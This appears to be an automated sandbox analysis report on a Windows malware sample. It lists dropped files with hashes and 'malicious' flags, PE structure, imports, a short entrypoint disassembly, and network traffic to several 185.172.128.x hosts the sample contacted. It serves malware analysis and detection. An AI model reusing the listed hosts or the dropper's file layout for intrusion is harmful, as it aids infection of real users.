SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........?.e.^.6.^.6.^.6.&K6.^.6.&[6.^.6.^.6.].6.(V6.^.6.(b6[^.6.(c6._.6.(g6.^.6.(S6.^.6.(R6.^.6.(U6.^.6Rich.^.6................PE..L.....kU...........%.........4............................................................@..........................*..........T............................ .........................................@............................................text............................... ..`.rdata..Y;.......<..................@..@.data........0...^..................@....rsrc................p..............@..@.reloc..d.... .......v..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\bunch.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1329417
Entropy (8bit):	7.898171122766659
Encrypted:	false
SSDEEP:	24576:7vktfYOP8kCc3P/X970uBuBFA3S8Fa+/D9kGmk3Lh9AvPG:7vk5H8LIt1e2Sl+if2YG
MD5:	1E8237D3028AB52821D69099E0954F97
SHA1:	30A6AE353ADDA0C471C6ED5B7A2458B07185ABF2
SHA-256:	9387488F9D338E211BE2CB45109BF590A5070180BC0D4A703F70D3CB3C4E1742
SHA-512:	A6406D7C18694EE014D59DF581F1F76E980B68E3361AE680DC979606A423EBA48D35E37F143154DD97FE5F066BAF0EA51A2E9F8BC822D593E1CBA70EAD6559F3
Malicious:	false
Preview:	...BPM.M.oe....Z.I..Y..t.........RIP\u.fZG..cFQ......h...DAO.P\...j...g.T..id..a...^.PttPbo..ei.i.Z..W.y.g..T_..bMVj.wWAP.v]..xQW..tW.kq..._q.B.nn....p.v.Ds.a.F...vT.Yga.o..A\PM..M.]s...u.lp[.sGmuvB.`YB..g.U....HTB[PU.y..moby..N..q...E.EOs.Q.C[C..^oAOo..sfe....wg.Z....Z...R.kx.DS.WYq.]..dXb.[k.xe.eQc..Z..L..IZ.X.f.x..q..u....Y.[ZH..[v..J.dT.I....RA._OW.x.cK..G]...xwZ....f.Nl`.p.ZS.yJ.J.p..`hn.hYg..u....[Qernk....P[.jJ.....l..RNf......ya.s.M...S.^[TyM..U.fFQ...w..v.KFw.X.....oS[h...NRj..UYt.....nM..d..G.R]j.x...Y.C..b....U.as`GOT.......T.d.GVQV...[.Ct[.`w.R..Vc..O.D.`.dH.jm..S[...Q.....LmoTY.D_.IM...uCtDVt.oW..LK.E..........Ek.fxT.e.f.p.a.O....gaQ.g.O..K.N..l.].......f.Z.[o...HVTJB.l.d.GYVD.U.o....^.F..uH.LH.n.f....Hx^kON..kT.Tld.T.KV.[...MM\NL...Z...R....pd......j..m.DhIFCSO..eMf.W..c.C.[..h.....y.^A..S.W...i.n....N.E.w_....QSGKKF.k.d.g..O...r...o..EKUV.....J...r...I..HU...]xFd.aq..GTC.s.a.p..J....r^GYK.P.C.....qH.....a[..V...FJIsJ._.WTIvtKE.k.me[...H..wTw.a....c...n[_.l...f.I....axf`O

C:\Users\user\AppData\Roaming\SecureClient\relay.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1596416
Entropy (8bit):	6.46619614175955
Encrypted:	false
SSDEEP:	49152:n2gm39uH+I5/GxEoadcqX7Q9F7r40YB+eTcq+PDXx1lWz0v2:DmtuH+e/RoadcqX7Qz7rDY8vq+Pbx1lc
MD5:	10D51BECD0BBCE0FAB147FF9658C565E
SHA1:	4689A18112FF876D3C066BC8C14A08FD6B7B7A4A
SHA-256:	7B2DB9C88F60ED6DD24B1DEC321A304564780FDB191A96EC35C051856128F1ED
SHA-512:	29FAF493BB28F7842C905ADC5312F31741EFFB09F841059B53D73B22AEA2C4D41D73DB10BBF37703D6AEB936FFACBC756A3CC85BA3C0B6A6863EF4D27FEFCD29
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S1,..PB..PB..PB.x&.<PB.x&.PB.x&.cQB..(...PB..(.>PB..PC..SB.x&..PB.x&..PB.x&..PB.x&..PB.Rich.PB.........PE..L.....kU...........%.....\...........0.......p......................................1.....@.................................dP..\|....p..........................z....}..................................@............p..,............................text...6Z.......\.................. ..`.rdata..J....p.......`..............@..@.data...\........Z...t..............@....rsrc........p......................@..@.reloc..6...........................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\SecureClient\whale.dbf

Download File

Process:	C:\Users\user\AppData\Local\Temp\u42w.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	87278
Entropy (8bit):	4.38402884518968
Encrypted:	false
SSDEEP:	1536:X5B5jj6bWG+5cAD2Fno6ktTgDa+0rldAe7VwDb4bWTfmdI7p:X5Ljj6bi512Fn3b0Ie7qgbWd9
MD5:	A723BF46048E0BFB15B8D77D7A648C3E
SHA1:	8952D3C34E9341E4425571E10F22B782695BB915
SHA-256:	B440170853BDB43B66497F701AEE2901080326975140B095A1669CB9DEE13422
SHA-512:	CA8EA2F7F3C7AF21B5673A0A3F2611B6580A7ED02EFA2CFD8B343EB644FF09682BDE43B25EF7AAB68530D5CE31DCBD252C382DD336ECB610D4C4EBDE78347273
Malicious:	false
Preview:	......P..E.o...]k.`...Y.....q.rsD.o.QPk.]fpZl\.R....DG..vyH^Q.....tpW........kgE.p.`O...............X..S.....x.....`.R.fZ.N...M..h...yC..H.O.XMQiV..sq..Ai.lV...Pv..WO].be.sU.nU..rGe.P....BE.MSnb.Lq....o.p..a.s..a..fEa..R..U.sNC.qZwI...XJ.M..H.h.........d.TSZR.UqXFj....Z.U..XTN.......B.CK...S._.^pjLRnbG^.u.D...mx..e......IYlK.l.....p._p.S.l...BZu..q.UG\.U....y.Xdi..Ff...rmqJ..V.AM.os.Oy..FV.._bNiEyiPIL.AW..GD.....che..iGU.oSi.Y..Yt.\].i.x.N.KN.`FKscyQ.M.....pqhieCU.c.ru..Melr.YRAM.Tg.......]..r.b.pP...._..gUo.`QvN.]il..G...q...NP.m.qHi.iiJ_^.[.Y...e.oHy.p.]..a...X.o....A.cL.C.A.._cQp..oD.L.L.O_.ewev.peB.ia..Ay.t.Y\W.]..l.F._i.....^.gDZTDNUj..dDM..o...........m..E........N.X..x...v..Cg....VuJ.k...Ec..JW`^yZ.u.B.im....T...C\.x..Z.G]B....u.r..gn.V...Q...mnN.quc.rM\..S...AjY.oVTa.p.Oebr.g........eC[A....cvqB..Ed..q.kR..BiYg`bQcA.E.XKs.\o.C..qyjUm.o..C..sc.F.xlnVI.q..q.Vs...p.Bg..O.dha..t..O.`x....c.n.....xr...f.ggn.LR[S..Aqk.j..u....nb.`Gd^...b.fYKZ^R..l...c..EbGm.pq..s..qwjn.`P...b..JE...t

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468192974508052
Encrypted:	false
SSDEEP:	6144:VIXfpi67eLPU9skLmb0b4iWSPKaJG8nAgejZMMhA2gX4WABl0uNKdwBCswSbk:WXD94iWlLZMM6YFHI+k
MD5:	4FFD0F78FBC25FACEA090D464AB9A8E7
SHA1:	0BB114037E3D288D0CC90327FA933F3BEE53F565
SHA-256:	738020363E1950ED1E737448D30A5E87231DAFACAE94AB5B2F4FE1C5135E281F
SHA-512:	368CD6D8696566AEA599E6F803B1462DEAE7CD34D77B0F9E930C669E8622D4CD535C4B3810302098E5838388DB4624DB8ABF721E6763C7A89F94377F827F071C
Malicious:	false
Preview:	regf7...7....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.C.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.705713853556455
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	g77dRQ1Csm.exe
File size:	425'985 bytes
MD5:	41de8e3e7412b6e97b60fdbfdd24b0ba
SHA1:	fa48e5a86b5f2b04b79f6c3459339a16c2db6aaa
SHA256:	480b540cb344d74306d03347658b2018a4b8504f4055ad15ba43456953d7b33c
SHA512:	d25d39fcbbc59677f4090ac5422c121d45c2085bfdb16adb7f8854a365636ac7baf42f74ccb435e11b1c355c83c28d80bfb58d8495e0d5ab2f59f3987390a1d5
SSDEEP:	12288:BFc5MyBQNGCCIYu7GJ9QICQfEHVmJspao:BOdWNYIx7W90uEao
TLSH:	D694F112B6ACDCF6D7A74A705C25CB94593FBDA01E63D1CB331C1BAE2D30290A725762
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............X...X...X..SX...X..EX...X..BX...X.).X...X...X...X..LX...X..RX...X..WX...XRich...X........PE..L......c...................

File Icon


Icon Hash:	67276767d3771667

Static PE Info

General

Entrypoint:	0x40164c
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x63B0F485 [Sun Jan 1 02:48:37 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	954261c9cff65161a03be3d46077b75e

Entrypoint Preview

Instruction
call 00007F2940502BF4h
jmp 00007F29404FEECDh
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
mov ecx, dword ptr [esp+04h]
test ecx, 00000003h
je 00007F29404FF076h
mov al, byte ptr [ecx]
add ecx, 01h
test al, al
je 00007F29404FF0A0h
test ecx, 00000003h
jne 00007F29404FF041h
add eax, 00000000h
lea esp, dword ptr [esp+00000000h]
lea esp, dword ptr [esp+00000000h]
mov eax, dword ptr [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, FFFFFFFFh
xor eax, edx
add ecx, 04h
test eax, 81010100h
je 00007F29404FF03Ah
mov eax, dword ptr [ecx-04h]
test al, al
je 00007F29404FF084h
test ah, ah
je 00007F29404FF076h
test eax, 00FF0000h
je 00007F29404FF065h
test eax, FF000000h
je 00007F29404FF054h
jmp 00007F29404FF01Fh
lea eax, dword ptr [ecx-01h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-02h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-03h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
lea eax, dword ptr [ecx-04h]
mov ecx, dword ptr [esp+04h]
sub eax, ecx
ret
mov edi, edi
push ebp
mov ebp, esp
sub esp, 20h
mov eax, dword ptr [ebp+08h]
push esi
push edi
push 00000008h
pop ecx
mov esi, 0040C1F4h
lea edi, dword ptr [ebp-20h]
rep movsd
mov dword ptr [ebp-08h], eax
mov eax, dword ptr [ebp+0Ch]
pop edi
mov dword ptr [ebp-04h], eax
pop esi
test eax, eax
je 00007F29404FF05Eh

Rich Headers

Programming Language:

[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[C++] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x57e0c	0x3c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x283c000	0xe2e9	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x57680	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x178	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa6b3	0xa800	c5de43341ea98e3f6c737a98c1bc812e	False	0.6148158482142857	data	6.560225096958423	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x4c69c	0x4c800	b8a9b363e9f444f47ead7d0b669cc15c	False	0.751318040236928	data	6.846333541367442	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x59000	0x27e22c8	0x2800	42ff89a79cc3f22597e9688745a6781c	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x283c000	0xe2e9	0xe400	7f09e603b35d4759918a2017341a18a9	False	0.49705317982456143	data	5.286359544961133	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
LAKUTIMIREXUKELIY	0x283c6ac	0x476	ASCII text, with very long lines (1142), with no line terminators	Turkish	Turkey	0.6260945709281961
RT_CURSOR	0x283cb24	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4276315789473684
RT_ICON	0x283cc54	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Turkish	Turkey	0.42937100213219614
RT_ICON	0x283dafc	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Turkish	Turkey	0.5681407942238267
RT_ICON	0x283e3a4	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Turkish	Turkey	0.6353686635944701
RT_ICON	0x283ea6c	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Turkish	Turkey	0.6799132947976878
RT_ICON	0x283efd4	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Turkish	Turkey	0.5195020746887967
RT_ICON	0x284157c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Turkish	Turkey	0.5905737704918033
RT_ICON	0x2841f04	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Turkish	Turkey	0.6143617021276596
RT_ICON	0x284236c	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Turkish	Turkey	0.43763326226012794
RT_ICON	0x2843214	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Turkish	Turkey	0.5627256317689531
RT_ICON	0x2843abc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Turkish	Turkey	0.6071428571428571
RT_ICON	0x2844184	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Turkish	Turkey	0.6596820809248555
RT_ICON	0x28446ec	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Turkish	Turkey	0.3865145228215768
RT_ICON	0x2846c94	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Turkish	Turkey	0.4111163227016886
RT_ICON	0x2847d3c	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Turkish	Turkey	0.43975409836065577
RT_ICON	0x28486c4	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Turkish	Turkey	0.44060283687943264
RT_STRING	0x2848b2c	0xd2	data			0.5523809523809524
RT_STRING	0x2848c00	0x552	data			0.44419970631424377
RT_STRING	0x2849154	0xf8	data			0.5564516129032258
RT_STRING	0x284924c	0x7dc	data			0.4150099403578529
RT_STRING	0x2849a28	0x15c	data			0.5229885057471264
RT_STRING	0x2849b84	0xdc	data			0.55
RT_STRING	0x2849c60	0x12a	data			0.5167785234899329
RT_ACCELERATOR	0x2849d8c	0x28	data			1.0
RT_GROUP_CURSOR	0x2849db4	0x14	data			1.15
RT_GROUP_ICON	0x2849dc8	0x68	data	Turkish	Turkey	0.7115384615384616
RT_GROUP_ICON	0x2849e30	0x76	data	Turkish	Turkey	0.6779661016949152
RT_VERSION	0x2849ea8	0x1e0	data			0.5645833333333333
RT_MANIFEST	0x284a088	0x261	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (549), with CRLF line terminators			0.5451559934318555

Imports

DLL

Import

KERNEL32.dll

GetConsoleAliasExesLengthA, GetCommState, GetModuleHandleW, GetProcessHeap, GetDateFormatA, GlobalAlloc, LoadLibraryW, HeapDestroy, IsBadWritePtr, GetModuleFileNameW, GlobalUnfix, GetProcAddress, SetFirmwareEnvironmentVariableW, GetLocaleInfoA, GetFileType, SetConsoleDisplayMode, SetCurrentDirectoryW, WaitForMultipleObjects, SetConsoleTitleW, FreeEnvironmentStringsW, BuildCommDCBA, VirtualProtect, GetCurrentDirectoryA, FindAtomW, FileTimeToLocalFileTime, SetFileAttributesW, GetVolumeInformationW, LoadLibraryA, EnumCalendarInfoA, GetCommandLineA, GetStartupInfoA, RaiseException, RtlUnwind, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapAlloc, GetLastError, HeapFree, EnterCriticalSection, LeaveCriticalSection, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, FreeEnvironmentStringsA, GetEnvironmentStrings, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, DeleteCriticalSection, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, InterlockedDecrement, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, SetFilePointer, GetConsoleCP, GetConsoleMode, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, VirtualAlloc, HeapReAlloc, HeapSize, InitializeCriticalSectionAndSpinCount, SetStdHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, MultiByteToWideChar, LCMapStringA, LCMapStringW, GetStringTypeA, GetStringTypeW, FlushFileBuffers, CreateFileA, CloseHandle

ADVAPI32.dll

ReadEventLogA

Possible Origin

Language of compilation system	Country where language is spoken	Map
Turkish	Turkey

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 25, 2024 09:03:47.785906076 CEST	49678	443	192.168.2.4	104.46.162.224
Apr 25, 2024 09:03:49.082750082 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 25, 2024 09:03:55.119510889 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 09:03:55.326363087 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 25, 2024 09:03:55.326500893 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 09:03:55.326591969 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 09:03:55.533045053 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 25, 2024 09:03:57.090905905 CEST	80	49730	185.172.128.90	192.168.2.4
Apr 25, 2024 09:03:57.091737032 CEST	49730	80	192.168.2.4	185.172.128.90
Apr 25, 2024 09:03:57.101283073 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 09:03:57.312200069 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 25, 2024 09:03:57.312438965 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 09:03:57.312439919 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 09:03:57.523452997 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 25, 2024 09:03:57.523858070 CEST	80	49731	185.172.128.228	192.168.2.4
Apr 25, 2024 09:03:57.524600029 CEST	49731	80	192.168.2.4	185.172.128.228
Apr 25, 2024 09:03:57.533304930 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.741056919 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.741161108 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.741254091 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.949049950 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949142933 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949219942 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949265003 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949286938 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.949311018 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949383974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.949445963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949493885 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949538946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949548006 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.949587107 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949631929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949649096 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:57.949656963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:57.949701071 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157120943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157145977 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157166004 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157206059 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157231092 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157265902 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157278061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157332897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157371998 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157396078 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157402039 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157440901 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157464981 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157465935 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157512903 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157654047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157674074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157702923 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157742023 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157762051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157799959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157816887 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157819986 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157840014 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157872915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157918930 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157968044 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.157979965 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.157988071 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.158042908 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365456104 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365483999 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365503073 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365519047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365566969 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365572929 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365572929 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365582943 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365622997 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365648031 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365667105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365688086 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365704060 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365714073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365739107 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365756035 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365772963 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365816116 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365861893 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365878105 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365921974 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.365935087 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365967989 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.365987062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366012096 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366024971 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366055012 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366133928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366189957 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366234064 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366250038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366266012 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366311073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 25, 2024 09:03:58.366318941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 25, 2024 09:03:58.366333961 CEST	80	49732	185.172.128.59	192.168.2.4
